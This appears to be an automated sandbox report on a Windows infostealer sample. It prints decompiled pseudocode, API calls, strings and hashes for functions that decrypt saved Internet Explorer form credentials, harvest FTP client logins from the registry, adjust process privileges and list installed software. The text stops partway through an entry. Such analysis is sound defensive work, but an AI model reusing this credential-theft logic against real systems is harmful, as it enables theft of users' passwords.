Opcode ID: 0b6ce98c2e71a0d2229f3dd03240f69c0e8c65a849d4abd5fd50b3642ce7d593
Instruction ID: 5e5cf996161199591b6a28a4ff005dbab79564ec832c2e4b7604db23a3f30ec1
Opcode Fuzzy Hash: 0b6ce98c2e71a0d2229f3dd03240f69c0e8c65a849d4abd5fd50b3642ce7d593
Instruction Fuzzy Hash: B44160B0600219AADF11AF61CC06AEE3B69AF84344F1041BBBA18750F1D7789AD1AE59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A712, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A712(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
				char _v24;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				signed int _t46;
				intOrPtr _t62;
				intOrPtr _t63;
				void* _t76;
				signed int _t77;
				void* _t80;
				void* _t81;

				_t76 = __ecx;
				_t46 = lstrlenW(_a8);
				if(_t46 != 0) {
					E00403510(_t76, _a8, (_t46 << 1) + 2,  &_v24);
					_t77 = 0;
					_v48 = 0;
					while(_t77 < 0x14) {
						_v48 = _v48 + ( *[ss:ecx+ebp-0x14] & 0x000000ff);
						_t77 = _t77 + 1;
					}
					_t80 = 0;
					_v52 = 0;
					while(_t80 < 0x14) {
						_push( *[ss:esi+ebp-0x14] & 0x000000ff);
						wsprintfA( &_v44, "%02X");
						_t81 = _t81 + 0xc;
						_v52 = E00401E4C( &_v44, _v52,  &_v44);
						_t80 = _t80 + 1;
					}
					_v48 = _v48 & 0x000000ff;
					_push(_v48);
					wsprintfA( &_v44, "%02X");
					_v52 = E00401E4C( &_v44, _v52,  &_v44);
					_t62 = E00401D71( *0x414869, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
					_t63 = _t62;
					if(_t63 != 0) {
						_v60 = _t63;
						if(_v56 != 0) {
							_v84 = (lstrlenW(_a8) << 1) + 2;
							_push(_a8);
							_pop( *_t26);
							_push(_v56);
							_pop( *_t28);
							_push(_v60);
							_pop( *_t30);
							_v72 = 0;
							if( *0x414b43 != 0) {
								_push( &_v76);
								_push(1);
								_push(0);
								_push(0);
								_push( &_v84);
								_push(0);
								_push( &_v68);
								if( *0x414b43() != 0 && _v72 != 0) {
									if(_a12 != 0) {
										 *_a12 = 0x3f;
									}
									E0040A4E9(0xbeef0003, _a8, _v72, _v76, _a4);
									LocalFree(_v72);
								}
							}
						}
						E004018B8(_v60);
					}
					return E004018B8(_v52);
				} else {
					return _t46;
				}
			}

0x0040a712
0x0040a721
0x0040a723
0x0040a739
0x0040a73e
0x0040a740
0x0040a74f
0x0040a74b
0x0040a74e
0x0040a74e
0x0040a754
0x0040a756
0x0040a783
0x0040a761
0x0040a76b
0x0040a770
0x0040a77f
0x0040a782
0x0040a782
0x0040a788
0x0040a78f
0x0040a79b
0x0040a7af
0x0040a7c4
0x0040a7c9
0x0040a7cb
0x0040a7d1
0x0040a7d8
0x0040a7eb
0x0040a7ee
0x0040a7f1
0x0040a7f4
0x0040a7f7
0x0040a7fa
0x0040a7fd
0x0040a800
0x0040a80e
0x0040a813
0x0040a814
0x0040a816
0x0040a818
0x0040a81d
0x0040a81e
0x0040a823
0x0040a82c
0x0040a838
0x0040a83d
0x0040a83d
0x0040a853
0x0040a85b
0x0040a85b
0x0040a82c
0x0040a80e
0x0040a863
0x0040a863
0x0040a872
0x0040a727
0x0040a727
0x0040a727

APIs

lstrlenW.KERNEL32(?), ref: 0040A71C
wsprintfA.USER32 ref: 0040A79B
lstrlenW.KERNEL32(?,?), ref: 0040A7E1
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A824
LocalFree.KERNEL32(00000000), ref: 0040A85B

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A7B9
%02X, xrefs: 0040A762, 0040A792

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1926481713-2450551051
Opcode ID: 6647c7f13e3975a35e780e360fbebd88ab62ad7df247ec204a1b0914c87d8627
Instruction ID: 7cec4ba5f278735bef2daa032c3da861db9c271a8c642e1c0fec04d74f03301a
Opcode Fuzzy Hash: 6647c7f13e3975a35e780e360fbebd88ab62ad7df247ec204a1b0914c87d8627
Instruction Fuzzy Hash: 5A414D72C1021CEADF11AFA1DC01AEDBB79FF04314F14803AF911B61A1D7799A51CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004051E3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
filestringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004051E3(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v322;
				void* _v328;
				CHAR* _v332;
				char** _v336;
				char* _t31;
				void* _t40;
				char** _t44;
				char** _t46;

				_v332 = 0;
				_t31 = _a8;
				if(_t31 == 0 ||  *_t31 == 0) {
					L12:
					return E004018B8(_v332);
				} else {
					E00405182(_a4, E00401DF8(_t31, _a8, _a12)); // executed
					_v332 = E00401DF8(E004018B8(_t33), _a8, "\*.*");
					E004018E6( &_v322, 0x13e);
					_t40 = FindFirstFileA(_v332,  &_v322); // executed
					_v328 = _t40;
					if(_t40 + 1 == 0) {
						goto L12;
					} else {
						goto L4;
					}
					do {
						L4:
						if((_v322.dwFileAttributes & 0x00000010) != 0) {
							_t44 =  &( &_v322->cFileName);
							_push(_t44);
							_push(0x414f84);
							L00410712();
							if(_t44 != 0) {
								_t46 =  &( &_v322->cFileName);
								_push(_t46);
								_push(0x414f86);
								L00410712();
								if(_t46 != 0) {
									_v336 =  &( &_v322->cFileName);
									E00405182(_a4, E00401E4C(E00401E4C(E00401DF8( &( &_v322->cFileName), _a8, "\\"), _t49, _v336), _t50, _a12));
									E004018B8(_t51);
								}
							}
						}
					} while (FindNextFileA(_v328,  &_v322) != 0);
					FindClose(_v328);
					goto L12;
				}
			}

0x004051ec
0x004051f9
0x004051fb
0x0040530b
0x00405317
0x00405207
0x00405217
0x0040522e
0x00405240
0x00405252
0x00405257
0x0040525e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405264
0x00405264
0x00405270
0x00405278
0x0040527b
0x0040527c
0x00405281
0x00405288
0x00405292
0x00405295
0x00405296
0x0040529b
0x004052a2
0x004052af
0x004052dc
0x004052e1
0x004052e1
0x004052a2
0x00405288
0x004052f8
0x00405306
0x00000000
0x00405306

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405252
lstrcmpi.KERNEL32(00414F84,?), ref: 00405281
lstrcmpi.KERNEL32(00414F86,?), ref: 0040529B
FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 004052F3
FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405306

Strings

\*.*, xrefs: 00405221

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$Filelstrcmpi$CloseFirstNext
String ID: \*.*
API String ID: 3663067366-1173974218
Opcode ID: abce2907b9ceeec2b444caf12c87fa27808904b757d057f167757f19a0a6580e
Instruction ID: 4170e0cdbb32cde0fb555d52f6b502d03a9112cbff49fd029bea05776b430742
Opcode Fuzzy Hash: abce2907b9ceeec2b444caf12c87fa27808904b757d057f167757f19a0a6580e
Instruction Fuzzy Hash: 18312D7190021AAADF21AB61CC42AEE77A9EF00314F0045BAF818B51E2D7789BD19F59

Uniqueness

Uniqueness Score: -1.00%

Function 00402968, Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402968(CHAR* _a4, intOrPtr _a8) {
				struct _LUID _v12;
				void* _v16;
				int _v20;
				void* _v24;
				void* _v28;
				struct _TOKEN_PRIVILEGES _v32;
				int _t19;
				int _t28;
				void* _t30;

				if( *0x414b3b == 0 ||  *0x414b3f == 0 ||  *0x414b27 == 0) {
					return 0;
				} else {
					_t30 = 0;
					_v16 = 0;
					_t19 = LookupPrivilegeValueA(0, _a4,  &_v12); // executed
					if(_t19 != 0) {
						if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v16) != 0) {
							_v32.PrivilegeCount = 1;
							 *_t7 = _v12.LowPart;
							_push(_v12.HighPart);
							_pop( *_t9);
							if(_a8 == 0) {
								_v20 = 0;
							} else {
								_v20 = 2;
							}
						}
						_t28 = AdjustTokenPrivileges(_v16, 0,  &_v32, 0x10, 0, 0); // executed
						if(_t28 != 0) {
							_t30 = _t30 + 1;
						}
					}
					if(_v16 != 0) {
						CloseHandle(_v16); // executed
					}
					return _t30;
				}
			}

0x00402976
0x0040298e
0x00402991
0x00402991
0x00402993
0x004029a3
0x004029ab
0x004029c3
0x004029c5
0x004029cf
0x004029d2
0x004029d5
0x004029dc
0x004029e7
0x004029de
0x004029de
0x004029de
0x004029dc
0x004029fd
0x00402a05
0x00402a07
0x00402a07
0x00402a05
0x00402a0c
0x00402a11
0x00402a11
0x00402a1a
0x00402a1a

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029A3
GetCurrentProcess.KERNEL32 ref: 004029AD
OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004029BB
AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004029FD
CloseHandle.KERNEL32(00000000), ref: 00402A11

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
Instruction ID: e5dea28dedcf19f79be4c8bfd698f998e52e89be124952076ce29543bc0c9a4f
Opcode Fuzzy Hash: fc9f9e775449fdf1cf86c9df712af2ede95f219a55d47c9d5b092a3d41e4426a
Instruction Fuzzy Hash: 1A111CB1A04209EFEF218F95DD49BEEB7B4BB40319F148136A151B41D0D7F89684CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0041051E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
comCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041051E(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				int* _t5;
				int* _t6;
				int _t10;
				void* _t18;
				void* _t19;
				void* _t21;

				_t24 = __eflags;
				_t19 = __ecx;
				_t18 = __ebx;
				L004107A8(); // executed
				_t5 = E00402BCA(E0040FA90(E00402530(), __eflags), __eflags); // executed
				_t6 = E00402C01(_t5, _t24); // executed
				_t7 = _t6;
				_t25 = _t6;
				if(_t6 != 0 && E00402CE7(_t7, _t25) != 0) {
					 *0x414d24 = 1;
				}
				 *0x4173a9 = E004018CF(0x101);
				 *(_t21 - 4) = 0x101;
				_t10 = GetUserNameA( *0x4173a9, _t21 - 4); // executed
				_t27 = _t10;
				if(_t10 == 0) {
					E004018B8( *0x4173a9);
					 *0x4173a9 = 0; // executed
				}
				E004020B9(_t18, _t19); // executed
				return E0040FAEC(E00401D9D(), _t18, _t27, "1357");
			}

0x0041051e
0x0041051e
0x0041051e
0x0041051e
0x0041052d
0x00410532
0x00410537
0x00410537
0x00410539
0x00410544
0x00410544
0x00410558
0x0041055d
0x0041056e
0x00410573
0x00410575
0x0041057d
0x00410582
0x00410582
0x0041058c
0x004105a1

APIs

OleInitialize.OLE32 ref: 0041051E
GetUserNameA.ADVAPI32(?,00000101), ref: 0041056E

Strings

1357, xrefs: 00410596

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: InitializeNameUser
String ID: 1357
API String ID: 2272643758-1433566376
Opcode ID: 9009a882bf03559a6605a0ee64cd6e5834a37b28e6fa8cbe3f6c415c999155d7
Instruction ID: f8a90d01b74eef74cfed5de9fe492a059dec9afd9cac863eb884a77ae8a26fbd
Opcode Fuzzy Hash: 9009a882bf03559a6605a0ee64cd6e5834a37b28e6fa8cbe3f6c415c999155d7
Instruction Fuzzy Hash: 1FF0FE74654209ADDB20BBB2DD076DD3AA65B0030CF14443BB918F11E2DAFD45C4EA2D

Uniqueness

Uniqueness Score: -1.00%

Function 004105D6, Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004105D6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				_Unknown_base(*)()* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				int _t5;
				char* _t6;
				void* _t7;
				void* _t8;
				void* _t10;
				void* _t13;

				_t13 = __eflags;
				_t10 = __ecx;
				_t9 = __ebx;
				_t1 = SetUnhandledExceptionFilter(??); // executed
				_t2 = E00410508(_t1, _t13); // executed
				_t3 = E0040FA90(_t2, _t13); // executed
				_t4 = E0040FD60(_t3, __ebx, __edi, _t13); // executed
				_t5 = E0040FE6F(_t4, __ebx, _t10, _t13); // executed
				if( *0x414d24 != 0) {
					_t15 =  *0x414b23;
					if( *0x414b23 != 0) {
						_t5 = RevertToSelf();
					}
					 *0x414869 = 0x80000001; // executed
				}
				_t6 = E00410223(_t5, _t15); // executed
				_t7 = E0041032D(_t6, _t10, _t15); // executed
				_t8 = E00410065(_t7, _t9, _t15); // executed
				return _t8;
			}

0x004105d6
0x004105d6
0x004105d6
0x004105d6
0x004105db
0x004105e0
0x004105e5
0x004105ea
0x004105f6
0x004105f8
0x004105ff
0x00410601
0x00410601
0x00410607
0x00410607
0x00410611
0x00410616
0x0041061b
0x00410620

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 004105D6
RevertToSelf.ADVAPI32 ref: 00410601

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterRevertSelfUnhandled
String ID:
API String ID: 669012916-0
Opcode ID: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
Instruction ID: 497a937cfd444ccb75a01f451d1fff2a03657cb5d6782b497a70bab0a2736278
Opcode Fuzzy Hash: cb76501a8b5efdf40eeb47ef9fa0f3767e36d88dbf6e333e52206afbcd3a8f02
Instruction Fuzzy Hash: 92D067744451498AD6757BF6A80A7DC3651ABC430EF40843FA401109A7CEFD24D8CD2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040F984, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040F984(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v15;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t19;
				char* _t25;
				void* _t27;
				intOrPtr _t28;

				_t8 = __eax;
				_t28 = _t27 + 0xfffffffc;
				_push(_t27);
				_push(0x40f999);
				asm("clc");
				if(__eflags < 0) {
					_t25 =  &_v15;
					asm("cld");
					 *__eax =  *__eax + __eax;
					 *_t8 =  *__eax + __eax;
					_t19 = 0x417215;
					_push(_v8);
					_pop( *0x4173a1);
					_t9 =  *[fs:0x30];
					__eflags =  *((char*)( *[fs:0x30] + 2));
					if(__eflags != 0) {
						_t9 = E00401021(_t9, __ebx, __ecx, __edx, __eflags, _v8);
					}
					while(1) {
						__eflags =  *_t19;
						if( *_t19 == 0) {
							break;
						}
						E0040240A(_t9);
						 *0x41739d = E00401522(_v8);
						_t12 = _t28;
						 *[fs:0x0] = _t28;
						_t9 =  *_t19(_v8, _t12, E0040FA2E, 0x40fa75, _t12, _t25,  *[fs:0x0],  *[fs:0x0]); // executed
						__eflags =  *_t19 - E004045FD;
						if( *_t19 != E004045FD) {
							__eflags = _t9 - 0x10;
							if(__eflags == 0) {
								_t9 = E004012DC(_t9, __eflags,  *0x4173a1,  *0x41739d);
							} else {
								_v20 = 1;
							}
						}
						_t28 = _t28 + 0x18;
						_pop( *[fs:0x0]);
						_t19 = _t19 + 4;
						__eflags = _t19;
					}
					return _v20;
				} else {
					return __eax;
				}
			}

0x0040f984
0x0040f987
0x0040f98b
0x0040f98f
0x0040f994
0x0040f995
0x0040f99a
0x0040f99b
0x0040f99c
0x0040f99e
0x0040f9a0
0x0040f9a5
0x0040f9a8
0x0040f9ae
0x0040f9b4
0x0040f9b8
0x0040f9bd
0x0040f9bd
0x0040fa7f
0x0040fa7f
0x0040fa82
0x00000000
0x00000000
0x0040f9c7
0x0040f9d4
0x0040f9e0
0x0040f9f6
0x0040fa00
0x0040fa02
0x0040fa08
0x0040fa0a
0x0040fa0d
0x0040fa24
0x0040fa0f
0x0040fa0f
0x0040fa0f
0x0040fa0d
0x0040fa29
0x0040fa75
0x0040fa7c
0x0040fa7c
0x0040fa7c
0x0040fa8d
0x0040f997
0x0040f997
0x0040f997

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed01d4cfb2e29545d8253cef9413e7fffcbc110b30fb49b671bf2a8bedab1260
Instruction ID: d83f140231b2433478d0a28666096bc940b33525d9759782800d4ca776c3ccd3
Opcode Fuzzy Hash: ed01d4cfb2e29545d8253cef9413e7fffcbc110b30fb49b671bf2a8bedab1260
Instruction Fuzzy Hash: EB110471608244FFDB214B59CC06F953F74E701B50F144037F80A629E2C33D4995EA4A

Uniqueness

Uniqueness Score: -1.00%

Function 004059A4, Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004059A4(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				long _t29;
				long _t32;

				E00405844(_a4, _a8, "Pass", "Host", "User", "Port", "Remote Dir", "Server Type", 0xbeef0013); // executed
				E00405844(_a4, _a8, "Server.Pass", "Server.Host", "Server.User", "Server.Port", "Path", "ServerType", 0xbeef0013);
				E00405844(_a4, _a8, "Last Server Pass", "Last Server Host", "Last Server User", "Last Server Port", "Last Server Path", "Last Server Type", 0xbeef0014);
				_t29 = RegOpenKeyA( *0x414869, _a8,  &_v8);
				if(_t29 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t32 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t33 = _t32;
						if(_t32 != 0) {
							break;
						}
						_v2068 = E00401E4C( &_v2064, E00401DF8(_t33, _a8, "\\"),  &_v2064);
						E004059A4(_a4, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t29;
			}

0x004059d6
0x00405a04
0x00405a32
0x00405a49
0x00405a4b
0x00405a4d
0x00405a54
0x00405a54
0x00405a74
0x00405a79
0x00405a7b
0x00000000
0x00000000
0x00405a9b
0x00405aaa
0x00405ab5
0x00405aba
0x00405aba
0x00000000
0x00405ac2
0x00405ac8

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405A44
RegEnumKeyExA.ADVAPI32 ref: 00405A74
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405AC2

Strings

Host, xrefs: 004059C6
Port, xrefs: 004059BC
Server Type, xrefs: 004059B2
Server.User, xrefs: 004059EF
Last Server Type, xrefs: 00405A0E
Last Server User, xrefs: 00405A1D
Last Server Pass, xrefs: 00405A27
Last Server Port, xrefs: 00405A18
User, xrefs: 004059C1
ServerType, xrefs: 004059E0
Server.Pass, xrefs: 004059F9
Remote Dir, xrefs: 004059B7
Server.Host, xrefs: 004059F4
Last Server Host, xrefs: 00405A22
Pass, xrefs: 004059CB
Server.Port, xrefs: 004059EA
Last Server Path, xrefs: 00405A13
Path, xrefs: 004059E5

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Last Server Host$Last Server Pass$Last Server Path$Last Server Port$Last Server Type$Last Server User$Pass$Path$Port$Remote Dir$Server Type$Server.Host$Server.Pass$Server.Port$Server.User$ServerType$User
API String ID: 1332880857-44262141
Opcode ID: fbe6a1297dfefc1fd067c59828427cc079b2c712672dcae10ee997c1b37d76b5
Instruction ID: ef9fb06cd34c7ccf76aa40754f09ac5043f5b2b84b8ceac9111509753786a159
Opcode Fuzzy Hash: fbe6a1297dfefc1fd067c59828427cc079b2c712672dcae10ee997c1b37d76b5
Instruction Fuzzy Hash: 51218131640A08FADF11AB50CC02FDD3B75AB84B05F20C167B515740E1DABD5AD0AF8C

Uniqueness

Uniqueness Score: -1.00%

Function 004020B9, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 172
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004020B9(void* __ebx, int* __ecx) {
				void* _v8;
				char _v4104;
				int _v4108;
				int _v4112;
				char _v4116;
				char _v4120;
				int _v4124;
				void* _v4128;
				intOrPtr _v4132;
				void* __edi;
				void* __ebp;
				long _t56;
				void* _t60;
				void* _t61;
				void* _t63;
				void* _t65;
				void* _t68;
				void* _t69;
				long _t74;
				void* _t78;
				intOrPtr _t81;
				void* _t83;
				void* _t84;
				void* _t88;
				void* _t89;
				char* _t90;
				void* _t98;
				void* _t103;
				int* _t104;
				int _t106;
				void* _t108;
				void* _t109;
				void* _t112;
				void* _t115;
				void* _t116;

				_t104 = __ecx;
				_t103 = __ebx;
				if( *0x4147ed != 0) {
					E004018B8( *0x4147ed);
					 *0x4147ed = 0;
				}
				_t119 =  *0x4147f1;
				if( *0x4147f1 != 0) {
					E004018B8( *0x4147f1);
					 *0x4147f1 = 0;
				}
				E00401000( &_v4116, _t104, _t119,  &_v4116); // executed
				E00401000( &_v4120, _t104, _t119,  &_v4120);
				_t56 = RegOpenKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall",  &_v8); // executed
				if(_t56 != 0) {
					L19:
					E00401569(_v4116, 0);
					E00401569(_v4120, 0);
					_t60 =  &_v4128;
					_push(_t60);
					_push(_v4116);
					L00410790();
					__eflags = _t60;
					if(__eflags >= 0) {
						_v4124 = E00401082(_t60, _t108, __eflags, _v4116);
						_t68 = E004018CF(_v4124); // executed
						 *0x4147ed = _t68;
						GlobalFix(_v4128);
						_t69 = _t68;
						__eflags = _t69;
						if(_t69 != 0) {
							_t106 = _v4124;
							_t115 = _t69;
							_t112 =  *0x4147ed; // 0x640b38
							memcpy(_t112, _t115, _t106);
							_t116 = _t116 + 0xc;
							_t108 = _t115 + _t106 + _t106;
							_t104 = 0;
							GlobalUnWire(_v4128);
						}
					}
					_t61 =  &_v4128;
					_push(_t61);
					_push(_v4120);
					L00410790();
					__eflags = _t61;
					if(__eflags >= 0) {
						_v4124 = E00401082(_t61, _t108, __eflags, _v4120);
						_t65 = E004018CF(_v4124); // executed
						 *0x4147f1 = _t65;
						GlobalFix(_v4128);
						_t61 = _t65;
						__eflags = _t61;
						if(__eflags != 0) {
							_t109 =  *0x4147f1; // 0x645e80
							memcpy(_t109, _t61, _v4124);
							_t104 = 0;
							_t61 = GlobalUnWire(_v4128);
						}
					}
					_t63 = E00401021(E00401021(_t61, _t103, _t104, _t107, __eflags, _v4116), _t103, _t104, _t107, __eflags, _v4120); // executed
					return _t63;
				}
				_v4112 = 0;
				while(1) {
					_v4108 = 0xfff;
					_t74 = RegEnumKeyExA(_v8, _v4112,  &_v4104,  &_v4108, 0, 0, 0, 0); // executed
					_t75 = _t74;
					if(_t74 != 0) {
						break;
					}
					_t78 = E00401DF8(_t75, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", "\\");
					if(_t78 != 0) {
						_t107 = _t78;
						_t81 = E00401E4C( &_v4104, _t78,  &_v4104);
						if(_t81 != 0) {
							_v4132 = _t81;
							_t83 = E00401D71(0x80000002, _v4132, "UninstallString",  &_v4124); // executed
							_t84 = _t83;
							if(_t84 != 0 && _t84 > 1) {
								_push(_t84);
								E0040157E(_v4116, _t84, _v4124); // executed
								_t88 = E00401D71(0x80000002, _v4132, "DisplayName",  &_v4124); // executed
								_t89 = _t88;
								if(_t89 == 0 || _v4124 <= 1) {
									_t90 =  &_v4104;
									_push(_t90);
									L0041066A();
									__eflags = _t90 + 1;
									E0040157E(_v4120,  &_v4104, _t90 + 1);
								} else {
									_push(_t89);
									_push(_t89);
									_push( &_v4104);
									L0041066A();
									E0040157E(_v4120,  &_v4104,  &_v4104);
									_pop(_t98);
									E0040157E(_v4120, _t98, _v4124);
									E004018B8();
								}
								E004018B8();
							}
							E004018B8(_v4132);
						}
					}
					_v4112 = _v4112 + 1;
				}
				RegCloseKey(_v8);
				goto L19;
			}

0x004020b9
0x004020b9
0x004020cb
0x004020d3
0x004020d8
0x004020d8
0x004020e2
0x004020e9
0x004020f1
0x004020f6
0x004020f6
0x00402107
0x00402113
0x00402126
0x0040212d
0x0040228e
0x00402296
0x004022a3
0x004022a8
0x004022ae
0x004022af
0x004022b5
0x004022ba
0x004022bc
0x004022c9
0x004022d5
0x004022da
0x004022e5
0x004022ea
0x004022ea
0x004022ec
0x004022ee
0x004022f4
0x004022f6
0x004022fc
0x004022fc
0x004022fc
0x004022fc
0x00402304
0x00402304
0x004022ec
0x00402309
0x0040230f
0x00402310
0x00402316
0x0040231b
0x0040231d
0x0040232a
0x00402336
0x0040233b
0x00402346
0x0040234b
0x0040234b
0x0040234d
0x00402357
0x0040235d
0x0040235d
0x00402365
0x00402365
0x0040234d
0x0040237b
0x00402383
0x00402383
0x00402133
0x0040213d
0x0040213d
0x00402166
0x0040216b
0x0040216d
0x00000000
0x00000000
0x00402182
0x00402184
0x0040218a
0x00402199
0x0040219b
0x004021a1
0x004021be
0x004021c3
0x004021c5
0x004021d4
0x004021e2
0x004021fe
0x00402203
0x00402205
0x0040224b
0x00402251
0x00402252
0x00402257
0x00402266
0x00402210
0x00402210
0x00402211
0x00402218
0x00402219
0x0040222c
0x00402231
0x0040223f
0x00402244
0x00402244
0x0040226b
0x0040226b
0x00402276
0x00402276
0x0040219b
0x0040227b
0x0040227b
0x00402289
0x00000000

APIs

RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,?), ref: 00402126
RegEnumKeyExA.ADVAPI32 ref: 00402166
lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF), ref: 00402219
lstrlen.KERNEL32(?,00000000,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000,?,00000000,?,00000FFF,00000000,00000000), ref: 00402252

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

RegCloseKey.ADVAPI32(?,?,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00402289
73D83240.OLE32(?,?,?,?), ref: 004022B5
GlobalFix.KERNEL32 ref: 004022E5
GlobalUnWire.KERNEL32 ref: 00402304
73D83240.OLE32(?,?,?,?,?,?), ref: 00402316
GlobalFix.KERNEL32 ref: 00402346
GlobalUnWire.KERNEL32 ref: 00402365

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

Strings

DisplayName, xrefs: 004021EE
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0040211C, 00402178
UninstallString, xrefs: 004021AE

Memory Dump Source

